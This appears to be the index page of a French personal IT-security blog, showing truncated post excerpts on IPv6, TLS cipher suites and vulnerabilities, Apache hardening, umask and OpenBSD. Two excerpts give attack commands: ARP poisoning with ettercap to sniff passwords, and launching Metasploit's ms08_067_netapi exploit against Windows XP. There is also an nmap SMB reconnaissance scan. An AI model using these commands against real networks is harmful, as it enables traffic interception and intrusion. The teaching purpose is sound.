// ne faites pas attention au désordre

Mémo IPv6

Pour voir tous les hôtes actifs sur le lien : $ ping6 -I eth0 ff02::1 Pour voir le routeur : ping6 -I eth0 ff05::2 Pour voir l’adresse de bouclage : $ ping6 ::1 Voir les interfaces : $ ip -6 addr show Configurer manuellement une adresse IPv6 : $ sudo ifconfig eth0 inet6 add 2001:ffff:0:f101::1/64 […]

Quelques blogs sur la sécurité informatique

http://nakedsecurity.sophos.com/ http://threatpost.com/ http://krebsonsecurity.com/ https://www.schneier.com/ http://taosecurity.blogspot.com/ http://securityweekly.com/ http://blog.uncommonsensesecurity.com/ https://securosis.com/blog http://www.mckeay.net/ http://www.securitybloggersnetwork.com/security-bloggers-network-the-feed/

Les suites cryptographiques

Une suite cryptographique (cipher suite) est une combinaison d’algorithmes permettant l’authentification, le chiffrement et l’intégrité des données ainsi que l’échange de la clé afin d’établir un paramétrage de sécurité pour une connexion réseau utilisant le protocole de communication Transport Layer Security (TLS). Elle est représentée généralement comme ceci : TLS_[Kx_]Au_WITH_En_Mac (exemples : TLS_RSA_WITH_RC4_128_MD5 et TLS_DHE_RSA_WITH_AES_128_CBC_SHA) […]

Vulnérabilités SSL/TLS

Voici quelques vulnérabilités concernant SSL/TLS : article à compléter! Avril 2014 : HEARTBLEED Versions vulnérables : Les versions d’OpenSSL de 1.0.1 à 1.0.1f Impacts : Accès à la mémoire et extraction possible d’information sensible (notamment la clé privée du serveur). La vulnérabilité vient plus précisément de l’implémentation de TLS et DTLS, qui ne gère pas […]

Configurer le chiffrement TLS d’Apache sous Debian

Avec les récentes failles (POODLE, FREAK..) et les recommandations de l’ANSSI, il est important de n’autoriser, dans la mesure du possible, uniquement que TLSv1.1 et TLSv1.2. Voici un document très intéressant présentant un état des lieux des récommandations : http://www.ssi.gouv.fr/uploads/IMG/pdf/SSL_TLS_etat_des_lieux_et_recommandations.pdf Comment configurer (au mieux?) Apache pour Debian Squeeze LTS, Debian Wheezy et Debian Jessie? L’installation […]

Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle… On active l’IP forwarding : $ sudo sysctl -w net.ipv4.ip_forward=1 On lance ettercap : $ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/ Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en […]

Attaquer un Windows XP avec Metasploit…

Lancement de metasploit : $ sudo msfconsole Utilisation de l’exploit « ms08_067_netapi » : msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > On affiche les options : msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE […]

Traquer Windows XP avec nmap…

… avec l’utilisation des scripts nmap smb-os-discovery.nse et smb-system-info.nse On lance nmap (ici depuis la distribution kali-linux) afin de scanner notre plage IP : root@kali# cd /usr/share/nmap root@kali:/usr/share/nmap# nmap -sV –script=scripts/smb-os-discovery.nse,scripts/smb-system-info.nse 192.168.0.0/24 Starting Nmap 6.25 ( http://nmap.org ) at 2014-11-21 10:04 CET … Nmap scan report for 192.168.0.53 Host is up (0.0011s latency). Not shown: […]

[confidentialité] Protection d’un fichier avec umask

Pour mettre un secret dans un fichier, on est tenté de faire : touch /etc/racoon/secret.txt chmod 600 /etc/racoon/secret.txt vi/etc/racoon/secret.txt Sauf qu’il faut absolument rendre atomique l’opération de création et d’ajustement des permissions : l’attaquant peut ouvrir un descripteur de fichier entre la création du fichier et l’ajustement des droits! Ce qu’il est donc préconisé de […]

OpenBSD 5.4, WordPress et Nginx

Voici comment installer WordPress sur OpenBSD. Pour installer un package, on renseigne la variable PKG_PATH : $ sudo export PKG_PATH=ftp://ftp.openbsd.org/pub/OpenBSD/5.4/packages/amd64/ On installe php-fpm qui ajoutera les dépendances (notamment php-5.3.27) : $ sudo pkg_add php-fpm Ambiguous: choose dependency for php-fpm-5.3.27: a 0: php-5.3.27 1: php-5.3.27 Your choice: 1 php-fpm-5.3.27:libiconv-1.14p0: ok php-fpm-5.3.27:libxml-2.9.0p0: ok php-fpm-5.3.27:gettext-0.18.2p3: ok php-fpm-5.3.27:femail-0.98: ok […]